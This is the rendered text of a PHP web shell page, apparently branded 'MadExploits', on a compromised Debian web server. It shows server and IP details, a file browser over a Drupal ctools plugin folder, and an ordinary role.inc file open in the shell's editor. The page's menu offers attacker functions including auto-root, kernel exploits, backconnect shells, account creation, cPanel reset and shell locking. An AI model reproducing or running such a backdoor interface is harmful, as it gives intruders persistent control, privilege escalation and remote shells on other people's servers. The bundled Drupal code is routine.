Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.249.84
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
access /
[ HOME SHELL ]
Name
Size
Permission
Action
book.inc
2.59
KB
-rw-r--r--
compare_users.inc
2.33
KB
-rw-r--r--
context_exists.inc
1.83
KB
-rw-r--r--
entity_bundle.inc
4.51
KB
-rw-r--r--
entity_field_value.inc
14.35
KB
-rw-r--r--
front.inc
1.04
KB
-rw-r--r--
node.inc
0
B
-rw-r--r--
node_access.inc
2.65
KB
-rw-r--r--
node_comment.inc
923
B
-rw-r--r--
node_language.inc
3.41
KB
-rw-r--r--
node_status.inc
915
B
-rw-r--r--
node_type.inc
3.71
KB
-rw-r--r--
path_visibility.inc
3.08
KB
-rw-r--r--
perm.inc
2.08
KB
-rw-r--r--
php.inc
2.1
KB
-rw-r--r--
role.inc
2.38
KB
-rw-r--r--
site_language.inc
2.46
KB
-rw-r--r--
string_equal.inc
2.78
KB
-rw-r--r--
string_length.inc
2.28
KB
-rw-r--r--
term.inc
3.8
KB
-rw-r--r--
term_has_parent.inc
5.66
KB
-rw-r--r--
term_parent.inc
2.74
KB
-rw-r--r--
term_vocabulary.inc
3.77
KB
-rw-r--r--
theme.inc
1.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : role.inc
<?php /** * @file * Plugin to provide access control based upon role membership. */ /** * Plugins are described by creating a $plugin array which will be used * by the system that includes this file. */ $plugin = array( 'title' => t("User: role"), 'description' => t('Control access by role.'), 'callback' => 'ctools_role_ctools_access_check', 'default' => array('rids' => array()), 'settings form' => 'ctools_role_ctools_access_settings', 'settings form submit' => 'ctools_role_ctools_access_settings_submit', 'summary' => 'ctools_role_ctools_access_summary', 'required context' => new ctools_context_required(t('User'), 'user'), ); /** * Settings form for the 'by role' access plugin */ function ctools_role_ctools_access_settings($form, &$form_state, $conf) { $form['settings']['rids'] = array( '#type' => 'checkboxes', '#title' => t('Role'), '#default_value' => $conf['rids'], '#options' => ctools_get_roles(), '#description' => t('Only the checked roles will be granted access.'), ); return $form; } /** * Compress the roles allowed to the minimum. */ function ctools_role_ctools_access_settings_submit($form, &$form_state) { $form_state['values']['settings']['rids'] = array_keys(array_filter($form_state['values']['settings']['rids'])); } /** * Check for access. */ function ctools_role_ctools_access_check($conf, $context) { // As far as I know there should always be a context at this point, but this // is safe. if (empty($context) || empty($context->data) || !isset($context->data->roles)) { return FALSE; } $roles = array_keys($context->data->roles); $roles[] = $context->data->uid ? DRUPAL_AUTHENTICATED_RID : DRUPAL_ANONYMOUS_RID; return (bool) array_intersect($conf['rids'], $roles); } /** * Provide a summary description based upon the checked roles. */ function ctools_role_ctools_access_summary($conf, $context) { if (!isset($conf['rids'])) { $conf['rids'] = array(); } $roles = ctools_get_roles(); $names = array(); foreach (array_filter($conf['rids']) as $rid) { $names[] = check_plain($roles[$rid]); } if (empty($names)) { return t('@identifier can have any role', array('@identifier' => $context->identifier)); } return format_plural(count($names), '@identifier has role "@roles"', '@identifier has one of "@roles"', array('@roles' => implode(', ', $names), '@identifier' => $context->identifier)); }
Close